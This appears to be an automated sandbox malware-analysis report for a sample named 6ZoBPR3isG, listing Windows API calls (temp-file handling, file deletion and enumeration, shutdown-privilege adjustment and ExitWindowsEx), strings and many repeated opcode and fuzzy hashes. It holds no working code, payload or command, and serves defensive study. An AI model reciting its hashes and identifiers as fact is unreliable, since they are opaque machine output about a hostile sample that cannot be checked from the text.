                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 86381a2b7f1b35c248ac9a2e7863932f3daa5c3e484b82c862647da7f286d2fc
                                                                                                              • Instruction ID: a1e537f6d91b10d9a76c7b689528a6a8b95f75ce6044f0f05c4baa08d549aca9
                                                                                                              • Opcode Fuzzy Hash: 86381a2b7f1b35c248ac9a2e7863932f3daa5c3e484b82c862647da7f286d2fc
                                                                                                              • Instruction Fuzzy Hash: 30B0923D208202EBCB05DB04D800D0FFBA3AFD8240F00C81CA08812271C632C8609A12
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                              • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                              • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                              • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                              • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                              • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                              • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                              • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                              • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                              • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                              • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                              • CopyFileW.KERNEL32(00438800,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                              • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3441113951-334447862
                                                                                                              • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                              • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                              • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNEL32(?,?,00437800,76133180,00000000), ref: 00405B23
                                                                                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,76133180,00000000), ref: 00405B6B
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,76133180,00000000), ref: 00405B8E
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,76133180,00000000), ref: 00405B94
                                                                                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,76133180,00000000), ref: 00405BA4
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: 0WB$\*.*
                                                                                                              • API String ID: 2035342205-351390296
                                                                                                              • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                              • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76133180,00405B1A,?,00437800,76133180), ref: 00406736
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID: xgB
                                                                                                              • API String ID: 2295610775-399326502
                                                                                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b32e2315b1c89c2952a9ab496cd8abdfc1cd3734c9a3f89d82bae6d7077594ac
                                                                                                              • Instruction ID: 6abf71fb7abf42bb5f6252b0f9c382848e58a897a8bc2e44bc4cde51ca2395cb
                                                                                                              • Opcode Fuzzy Hash: b32e2315b1c89c2952a9ab496cd8abdfc1cd3734c9a3f89d82bae6d7077594ac
                                                                                                              • Instruction Fuzzy Hash: 7E629974E05228CFEB65DF65C894BDDBBB2BB89301F1081EAD849A7250DB319E81DF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3d6b1444d1f00e466bb265acdcd9bdce3b43d2d64a2892d6fdd30884d993943b
                                                                                                              • Instruction ID: f75a18e0aaad14a6abd60ce31969b55c37abd9b2f0c2ccd617e8702c42487af6
                                                                                                              • Opcode Fuzzy Hash: 3d6b1444d1f00e466bb265acdcd9bdce3b43d2d64a2892d6fdd30884d993943b
                                                                                                              • Instruction Fuzzy Hash: AEC19174E00218CFEB14DFA5D994BADBBF2BF89304F1081A9D409AB395DB359A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ad16eadb8a2132bffda3a5bbd4f8c7536361ffa01eb7b4b6fac96fd4ff476117
                                                                                                              • Instruction ID: 74b762dcc6260d565b3c8e6b018b9a2ef0f32ebd579e77bd4544d215b7210579
                                                                                                              • Opcode Fuzzy Hash: ad16eadb8a2132bffda3a5bbd4f8c7536361ffa01eb7b4b6fac96fd4ff476117
                                                                                                              • Instruction Fuzzy Hash: 35C19E74E00218CFEB14DFA5D994BDDBBF2AF89304F2081A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac22ea477d1878881e2d99a6fa3eeeed9b2bfb00151766d3cc50765f3e211473
                                                                                                              • Instruction ID: 7ad250c7c423c4da25fae0bcda5e3d72b7e59020e2e761d52a6314d08ad156dd
                                                                                                              • Opcode Fuzzy Hash: ac22ea477d1878881e2d99a6fa3eeeed9b2bfb00151766d3cc50765f3e211473
                                                                                                              • Instruction Fuzzy Hash: 02C19E74E00218CFEB54DFA5D994BDDBBF2AF89304F2080A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 41bc3fca9260eead8806142347605b013aaa7e132c46335b0ff92bf1dd59b640
                                                                                                              • Instruction ID: 1ebb9bc4d60cd84956c0536fdbb971cff6e17b3248141dcc9bbc57c86aced200
                                                                                                              • Opcode Fuzzy Hash: 41bc3fca9260eead8806142347605b013aaa7e132c46335b0ff92bf1dd59b640
                                                                                                              • Instruction Fuzzy Hash: 1EC18E74E00218CFEB14DFA5D994B9DBBF2BF89304F2080A9D409AB395DB359A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2893eab9e4a004917d38396e0edeab68c6a74027c583ddeecdd18a3d5406f3d3
                                                                                                              • Instruction ID: ddcfddbdb3e075dcdd1794e799c0e83283aff44b040164ad8c229bd53cabe309
                                                                                                              • Opcode Fuzzy Hash: 2893eab9e4a004917d38396e0edeab68c6a74027c583ddeecdd18a3d5406f3d3
                                                                                                              • Instruction Fuzzy Hash: 40C19D74E00218CFEB14DFA5D994BDDBBF2AF89304F2080A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d1a43d29148f5a3ec023fbd20b501e9613325eeb230146e23814ead95feb320
                                                                                                              • Instruction ID: 3d3a190620b52e02629ac369f8a8b9bc6dd09efab02cd9f3f8ec37a2248140fb
                                                                                                              • Opcode Fuzzy Hash: 4d1a43d29148f5a3ec023fbd20b501e9613325eeb230146e23814ead95feb320
                                                                                                              • Instruction Fuzzy Hash: 6BC19E74E00218CFEB14DFA5D994B9DBBF2BF89304F2080A9D409AB395DB359A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 87cf3a4d51effb28672bc1b869ed7b4e344e4e52f973d9e736c7cd0293a43565
                                                                                                              • Instruction ID: b9666f8bb59192fb326fa287e1072de37057f22d70ffb562d51dc56e32ec8cac
                                                                                                              • Opcode Fuzzy Hash: 87cf3a4d51effb28672bc1b869ed7b4e344e4e52f973d9e736c7cd0293a43565
                                                                                                              • Instruction Fuzzy Hash: 2EC19D74E00218CFEB54DFA5D994BDDBBF2AF89304F2081A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07f767adc02e5dad4cbbe11bc6f92fafeb09a35d57b642ff9a70fe8808c79e6c
                                                                                                              • Instruction ID: 719dedd5c95286301f8630485b41b8acaf86cb00fbb46b0ed222d4c34bb014bd
                                                                                                              • Opcode Fuzzy Hash: 07f767adc02e5dad4cbbe11bc6f92fafeb09a35d57b642ff9a70fe8808c79e6c
                                                                                                              • Instruction Fuzzy Hash: 88C19D74E00218CFEB14DFA5D994B9DBBF2AF89304F2081A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 50a9ce006d49951b219238a57bb7eb7030e1644aa0c1415e0eeb49d4bc136205
                                                                                                              • Instruction ID: 773fea470602f7c4f47349accff224ee10ad2242ed4a1240ad284436a05a41df
                                                                                                              • Opcode Fuzzy Hash: 50a9ce006d49951b219238a57bb7eb7030e1644aa0c1415e0eeb49d4bc136205
                                                                                                              • Instruction Fuzzy Hash: 59C18D74E00218CFEB14DFA5D994B9DBBF2BF89304F2081A9D409AB395DB359A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bdbdd24073ca48b2f7d90e4cb049ead4ff1e451f93f108767e25a8f0f144a008
                                                                                                              • Instruction ID: 4ac5cfe50c6654def038a3318b52376436cd2dd534e298a389b8c0f70984976d
                                                                                                              • Opcode Fuzzy Hash: bdbdd24073ca48b2f7d90e4cb049ead4ff1e451f93f108767e25a8f0f144a008
                                                                                                              • Instruction Fuzzy Hash: 59C19F74E00218CFEB54DFA5D954BDDBBF2AF89304F2080A9D409AB395DB359A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a20298dccece89cf8e981517841c03261c12283d4f5e14a9bfc9606b45f1d9df
                                                                                                              • Instruction ID: b4bf008874ef100076dedc9859bfc4b7a71da5ce6c55cca696791067ae30285f
                                                                                                              • Opcode Fuzzy Hash: a20298dccece89cf8e981517841c03261c12283d4f5e14a9bfc9606b45f1d9df
                                                                                                              • Instruction Fuzzy Hash: 38C19C74E00218CFEB54DFA5D994B9DBBB2FF89304F2480A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 988176fd0240a9342978f540b941c25eadc6ff01ab77b4d9b844e54d275ca184
                                                                                                              • Instruction ID: 1a04257ef6a3fefa13fc9768837692acdb895f81ad17bacb51956ed74dd54b82
                                                                                                              • Opcode Fuzzy Hash: 988176fd0240a9342978f540b941c25eadc6ff01ab77b4d9b844e54d275ca184
                                                                                                              • Instruction Fuzzy Hash: 97C19D74E00218CFEB54DFA5D994BDDBBF2AF89304F2081A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 361eb1ce1742bb170a9852fab9bbd5dc658ec1b010145247ce023eb2df207a11
                                                                                                              • Instruction ID: 4ee4d03890070549558de27f1026c740e39134540ca134c3912d035181ddbe6a
                                                                                                              • Opcode Fuzzy Hash: 361eb1ce1742bb170a9852fab9bbd5dc658ec1b010145247ce023eb2df207a11
                                                                                                              • Instruction Fuzzy Hash: 23C18F74E00218CFEB54DFA5D954B9DBBB2BF89304F2080A9D409BB395DB359A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb678a84b323e03fe0a2835b1293ff667fba3a17048b54dd44359cf0c843d9dc
                                                                                                              • Instruction ID: bdc53ce434ba7a951cee64fd26eb2426dcbaaa5509891a80c474740e8c0924b5
                                                                                                              • Opcode Fuzzy Hash: bb678a84b323e03fe0a2835b1293ff667fba3a17048b54dd44359cf0c843d9dc
                                                                                                              • Instruction Fuzzy Hash: A9C19D74E00218CFEB54DFA5D994BDDBBB2AF89304F2480A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
